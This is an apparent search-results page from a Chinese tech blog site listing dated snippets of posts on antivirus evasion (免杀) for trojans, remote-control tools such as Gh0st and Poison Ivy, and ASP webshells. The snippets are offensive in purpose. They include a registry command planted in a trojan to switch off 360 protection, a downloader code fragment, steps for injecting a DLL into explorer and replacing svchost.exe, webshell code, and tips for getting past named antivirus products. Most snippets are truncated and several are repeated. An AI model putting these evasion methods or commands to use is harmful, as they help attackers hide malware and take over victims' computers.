veil免杀

局域网入侵简单方法

入侵工具:一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版4.5.
fusentao·2012-04-21 14:28

免杀汇编教程(汇编花指令)

相信很多朋友都做过木马免杀,早期的免杀都是加壳和改特征码,现在免杀技术已经发展到花指令免杀,改壳之类的,而这些需要一定的汇编知识,但是汇编却不是一块容易啃的骨头,所以我写了这篇菜鸟版的免杀汇编教程,帮助小菜们快速入门
·2012-03-27 17:00

BT5 实战之AV bypass and Bypass AV

Backtrack5实战之AVbypassandBypassAV免杀创作(AVbypass)---ARP欺骗(MITM)---干掉杀软(BypassAV)                        
ilovecto·2012-03-03 16:04

C++源代码免杀之函数的动态调用

   最近也在学着修改Gh0st远控的源代码,源代码免杀起来还是方便、简单、有效和简单点。针对于输入输出表盯的比较紧的杀毒软件,最有效的还是进行函数动态调用。
shiningstar610·2012-02-15 08:52

黑客导航网

实用工具IP查询md5解密加密瑞星最新漏洞库端口在线检测在线翻译网速测试网站估值摩尔密码转换Html转JsHtml转UBB全库网123查XSS小助手黑站统计whois查询PHP在线加密免杀在线代理ASCII
djinglan·2012-02-09 16:00

安全软件集体2012了?

但很明显的是,盗走代码的黑客将有机会解读这段“宝贵代码”,并针对性的研究出更多免杀病毒。   掐指一算,从元旦到春节前夕的短短十多天的时间中,各路有关“安全危
康斯坦丁K·2012-01-17 00:02

批处理+Linux书籍+黑客编程+脚本攻防+逆向工程书籍+海量资源(pdf+chm电子书)

CHMhttp://yunfile.com/file/yunkey/0955157e/精通脚本黑客http://yunfile.com/file/yunkey/636cd045/杀不死的秘密—反汇编揭露黑客免杀
god_7z1·2012-01-11 11:52

远程控制是与非,免费免杀远程控制软件介绍

不管远程控制是非对错,在2011年度的结束,本文挑选出一款免费免杀的远程控制软件,网络人远程控制软件做一个简单介绍。 办公版完全免费,绿色简单办公网络人远程控制软
网络人技术·2012-01-10 16:30

输入表免杀方法

输入表是PE文件结构中不可或缺的部分,输入表也称之为“导入表”。要想了解输入表,首先还得先从DLL文件入手,dll文件也就是“动态链接库文件”,这些文件中有很多的导入函数,这些函数不会直接被执行,当一个程序(EXE)运行时,导入函数是被程序调用执行的,其执行的代码是不在主程序(EXE)中的一小部分函数,其真正的代码却在DLL文件中。在PE文件映射到内存后,windows将相应的DLL文件装入,EX
arhatlohan·2011-12-26 23:50

ghost源码免杀教程 步

     远控软件gh0st源码免杀2010-12-1314:57远控软件gh0st3.6开源了,开源意味着我们可以在此基础上进行二次开发,同时也意味着杀软可以较容易的查杀该款远控木马,既然要利用,我们就做好源码基础上的木马免杀工作
cdma129·2011-12-21 06:39

简单免杀下载者 永远不被杀毒发现

  自己写的一个下载者因为没有复杂的东西所以杀毒一般不会报毒的不过缺点也是有的自己开发吧   OptionExplicitPrivateDeclareFunctionURLDownloadToFileLib"urlmon"Alias"URLDownloadToFileA"(ByValpCallerAsLong,ByValszURLAsString,ByValszFileNameAsString,B
cdma129·2011-12-21 06:32

在一黑客论坛上看见的:360免杀技术介绍

阅读更多一、ASM汇编这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择“二进制”→“编辑”,在ASCII中输入“Cmd/cREGaddHKLM\SOFTWARE\360Safe\safemon/vMonAccess/tREG_DWORD/d0/f”记下写入命令的改动的第一个地址,假设为401180。再找一个小空段,记下地址,假设为40116A写入:
ybds·2011-12-11 00:00

在一黑客论坛上看见的:360免杀技术介绍

一、ASM汇编这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择“二进制”→“编辑”,在ASCII中输入 “Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址,假设为401180。再找一个小空段,记下地址,假设为4
ybds·2011-12-11 00:00

黑客vip教程

PcShareVIP内部免杀教程[url]http://www.pcshare8.com/exepasskav.rar[/url][url]http://www.pcshare8.com/syspassrav.rar
cdma129·2011-12-07 12:39

黑客防线入侵必备工具包(vip专用的)

[啊D网络工具包]DTools[免杀版]一款经过免杀处理的啊D网络工具包。2.ssport1.高速扫描:扫描的速度只跟你的CPU的速度有关。现在的极限速度是每秒扫1000个端口。2.
璇玑CTO·2011-11-25 12:34

远控上线新思路

昨日很无奈 来到工作地看到死党在打游戏 他答应我做免杀好几个月了还没做出来 都不知道他学那去了难道又要拖我 后腿 做了这么久就做了个上兴远控的免杀免杀才1个月 没办法我在网吧就只能用鸽子外网上线
673341766·2011-11-17 10:00

远控上线新思路

昨日很无奈来到工作地看到死党在打游戏他答应我做免杀好几个月了还没做出来都不知道他学那去了难道又要拖我后腿做了这么久就做了个上兴远控的免杀免杀才1个月没办法我在网吧就只能用鸽子外网上线什么都有没路由权5555
a673341766·2011-11-15 21:53

远控上线新思路

 昨日很无奈来到工作地看到死党在打游戏他答应我做免杀好几个月了还没做出来都不知道他学那去了难道又要拖我后腿做了这么久就做了个上兴远控的免杀免杀才1个月没办法我在网吧就只能用鸽子外网上线什么都有没路由权
a673341766·2011-11-15 21:00

利用INF安装服务启动 及 浅析瑞星行为检测、360主动防御

行为防御、云安全技术等一些新技术不断的加入反病毒的行列,这让很多习惯基于特征码免杀的朋友(包括笔者在内)措手不及。
dongbian·2011-11-01 17:20

定位免杀NOD32的一些经验

定位免杀NOD32的一些经验----collectdyingsite:http://www.idying.cn欢迎大家一起讨论先说下定位方法:1NOD32不能正向定位的,定位出来也是不能修改的!
chinafe·2011-10-27 11:00

Poison Ivy 2.3.0 免杀的几点思路

 文章作者:mika[EST]今天在国外的IRC里看到有几个老外在讨论PI2.3的免杀,由于PI2.3的对齐方式跟过去的不太一样导致使用加壳程序处理后不能正常运行,所以它的免杀成了大家关注的对象了。
u011351173·2011-10-04 20:00

编译PI远控SHELLCODE(VC++)加异或免杀(转载于网络)

 来自暗组,但原贴有诸多语法错误,以下是修正后的编译法。一,直接编译:#include#pragmacomment(linker,"/OPT:NOWIN98")#pragmacomment(linker,"/subsystem:\"windows\"/entry:\"mainCRTStartup\"")#pragmacomment(linker,"/MERGE:.rdata=.text")//合并
u011351173·2011-10-04 20:00

一个批处理:IPC$ Password Crack---BAT

有时候在肉鸡下面想整个其他的肉鸡,用SOCK5反向代理,麻烦又慢,有N多线程的IPC$密码破解工具,无奈别人装着杀软哇,做个免杀忒麻烦,大可不必动用牛刀,直接上个批处理脚本,如果被杀了是你人品问题,哈哈
batcracker·2011-09-21 13:01

灰鸽子远程控制各版本对比

灰鸽子远程控制各版本对比及下载地址1.自己已经不玩免杀了,但是就是酷爱灰鸽子,因为他的稳定确实是太出众了下面从甲壳虫技术论坛里面找到这篇文章,就是介绍灰鸽子远程控制各个版的,希望能让大家对灰鸽子有更加深入的了解
Vken·2011-09-18 18:54

壳的相关知识与木马加壳改壳免杀及各类修改特征码免杀方法

转自:MaskDiy博客1.壳的分类:压缩壳和加密壳2.壳的作用:保护和文件免杀二.加壳免杀的几个弱点1.不能躲过像瑞星这类具有内存查杀功能的杀毒软件。
Vken·2011-09-14 17:30

输出表免杀方法

1.输出表加密输入表函数加密的方法和加密字符串的方法一样,可以把输出表函数当作是字符串来对待2.输出表移位先把输出表函数的名称移位,然后改名称RVA的地址为输入表函数的新地址就可以了3.加空函数用LodePe把输出表的“函数数量”和“函数名数量”都加1或更多4.修改函数指针函数换位把输出表函数的RVA、名称RVA、和函数名都记录下来,然后互相交换,交换完成之后,还得把函数名补全5.改输出表大小用L
Vken·2011-09-07 21:53

分享下我的双功能免杀asp小马 超强版

转自:八神第一款:GIF89a$     ;""thensetfs=server.CreateObject("scripting.filesystemobject")setthisfile=fs.CreateTextFile(testfile,True)thisfile.Write(""&msg&"")iferr=0Thenresponse.write"ok"elseresponse.write"
Vken·2011-08-30 15:47

输入表免杀方法

输入表是PE文件结构中不可或缺的部分,输入表也称之为“导入表”。要想了解输入表,首先还得先从DLL文件入手,dll文件也就是“动态链接库文件”,这些文件中有很多的导入函数,这些函数不会直接被执行,当一个程序(EXE)运行时,导入函数是被程序调用执行的,其执行的代码是不在主程序(EXE)中的一小部分函数,其真正的代码却在DLL文件中。在PE文件映射到内存后,windows将相应的DLL文件装入,EX
Vken·2011-08-23 15:52

免杀需要的基本汇编知识

搜集的资料感觉挺好用,不知道谁总结的感觉挺全的,作为参考一.机械码,又称机器码Ultraedit打开,编辑exe文件时你会看到许许多多的由0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F组成的数码,这些数码就是机器码。修改程序时必须通过修改机器码来修改exe文件。二.需要熟练掌握的全部汇编知识不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了。cmpa,b比较a与b。mova
Vken·2011-08-22 09:58

最近有点空闲,想学习下免杀

有空了,想捣鼓一下木马,令我有点郁闷的是找不到一款好用的远控软件,于是随便找了个网上常用的远控,自己顺便了解下木马免杀的,准备工作正在进行中。。。。。。。。。。。。。。
Vken·2011-08-18 08:06

ASP木马免杀方法

(WORD可以转换大小写,这招对ASPX木马免杀很管用)。3.混水摸鱼法这种方法也常奏效.fso写成"f
yu326343191·2011-08-17 07:17

对星外主机提权利用

上传了个BIN免杀ASPX大马其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限!
wordman·2011-08-05 01:13

免杀远程监控软件大盘点

免杀而功能又强悍的远程监控软件真是凤毛麟角。今天就在这里搭建一个免杀远程监控软件擂台赛,一决雌雄。目前黑客软件大致可分为四种:网络间谍(NETSPY)、网络巴士(NETBUS)
JSFIDO·2011-08-04 09:26

高级免杀前的基础揭秘

高级免杀前的基础揭秘高级免杀,小弟不敢怠慢,赶快把自己总结的笔记贡献给大家。随着2011的来临,大部分杀毒软件都相继推出了试用版。其中有许多出名的杀软都增强了自己的查杀方式。
1017260687·2011-06-15 19:27

高级免杀前的基础揭秘

                                                        高级免杀前的基础揭秘高级免杀,小弟不敢怠慢,赶快把自己总结的笔记贡献给大家。
1017260687·2011-06-15 19:27

木马免杀原理及方法(超全)

灰鸽子免杀概况免杀意为免除被杀毒软件杀掉的软件。
zhangnn5·2011-05-22 03:00

木马压缩免杀方法

WinRAR是我们用得最多的压缩软件,很多朋友只知道它可以实现文件的压缩和解压缩功能,但是不会想到它还是黑客用来制作免杀木马的利器,黑客通过WinRAR可以制作出免杀的捆绑型木马,当我们解压缩文件时,就会成为黑客的肉鸡
zhangnn5·2011-05-21 23:00

XMAN NBDDOS6.0公测版

修改自强大NBDDOS,直接代码编译,免杀,只用于学习,如果用于非法,后果自负。 
wordman·2011-05-14 15:46

源码免杀实战之Gh0st过瑞星2010主动和防火墙

1.瑞星防火墙: 过瑞星防火墙的方法很简单,只要修改两个地方就可以了。gh0st\include\IOCPServer.cppServer\svchost\ClientSocket.cpp BYTEbPacketFlag[]={'G','h','0','s','t'};修改成任何字符即可,但要注意的是,这样修改后,就不能和以前的gh0st相兼容了,修改后的服务端用以前的控制端将不能上线。 2.瑞星
wordman·2011-05-12 15:35

总结木马免杀方法

 一.入口点加1免杀法:1.用到工具PEditor2.特点:非常简单实用,但有时还会被卡巴查杀3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可二.变化入口地址免杀法:1.用到工具:OllyDbg
ln923280·2011-05-02 22:31

免杀宝典(电子书)

免杀修改特征码需要掌握的汇编知识 一.机械码,又称机器码一.机械码,又称机器码Ultraedit打开,编辑exe文件时你会看到许许多多的由0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F组成的数码
maskdiy·2011-04-20 23:33

2011木马过各类杀软主动防御免杀经验

1、瑞星程序运行后,立刻修改掉程序名字即可过主动2、360杀毒想过保护,把程序名字改成一些特定的,就可以过了360也不报比如说,你想安装个自动启动的服务,一般360都会报,只要那服务的名字是一些特定的名字,就不报了。3、卡巴把程序改成中文名字就过了……4、NOD把小马释放到C:\Windows\System32\svchost1.exe然后把原本的svchost.exe改个名字,把小马改成svch
maskdiy·2011-04-19 21:39

新手学免杀之myccl使用指南

免杀的开始:用WinHex逐字节修改木马免杀->到后来软件保护(加壳)的加入、特征码免杀技术的公开、多层加壳的发现、反调试技术、针对于PE文件格式的免杀,到如今盛行的源码免杀
maskdiy·2011-04-19 21:30

delphi远控免杀经典教学

也就是说,如果加入了垃圾汇编代码,就网网可以直接过免杀。例如:asmnopnopnopend;这样的形式。。。可以在多处加入这样的垃圾代码,该招数对瑞星效果不错,2:修改单元文件名。
maskdiy·2011-04-18 12:10

局域网入侵

入侵工具:一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版4.5.
wsj234·2011-04-15 22:03

asp木马代码解密的随机加密webshell

随机加密webshell,解密还不错,应当免杀加密源码复制代码代码如下:首先这是一个VBScript.Encode加密,微软的screnc.exe加密兼容性好。
·2011-04-01 23:22

免杀小方法-释放不完整的动态库文件

1.从自身资源释放不完整的动态库文件AA.temp和BB.temp到临时目录 2.从自身文件末尾读取标识字段并判断标识的完整性,从自身读取内容修改动态库AA.tempBB.temp使之完整 3.把AA.temp和BB.temp移动到system32目录并改名为msctfime.iem和dbr.ocx 4.创建远程线程把msctfime.iem注入到explorer 5.把system32/rund
chinafe·2011-02-20 10:00

免杀小方法-释放不完整的动态库文件

1.从自身资源释放不完整的动态库文件AA.temp 和 BB.temp到临时目录 2.从自身文件末尾读取标识字段并判断标识的完整性,从自身读取内容修改动态库AA.temp BB.temp使之完整 3.把AA.temp和BB.temp移动到 system32目录 并改名为 msctfime.iem和dbr.ocx 4.创建远程线程把msctfime.iem注入到explorer 5.把 sy
61party·2011-02-20 10:00

免杀小方法-释放不完整的动态库文件

1.从自身资源释放不完整的动态库文件AA.temp 和 BB.temp到临时目录 2.从自身文件末尾读取标识字段并判断标识的完整性,从自身读取内容修改动态库AA.temp BB.temp使之完整 3.把AA.temp和BB.temp移动到 system32目录 并改名为 msctfime.iem和dbr.ocx 4.创建远程线程把msctfime.iem注入到explorer 5.把 sy
javahigh1·2011-02-20 10:00

各大Asp木马的万能密码

web=admin还有易思免杀ASP大马,密码?
obnus·2011-02-08 21:33
上一页 19 20 21 22 23 24 25 26 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他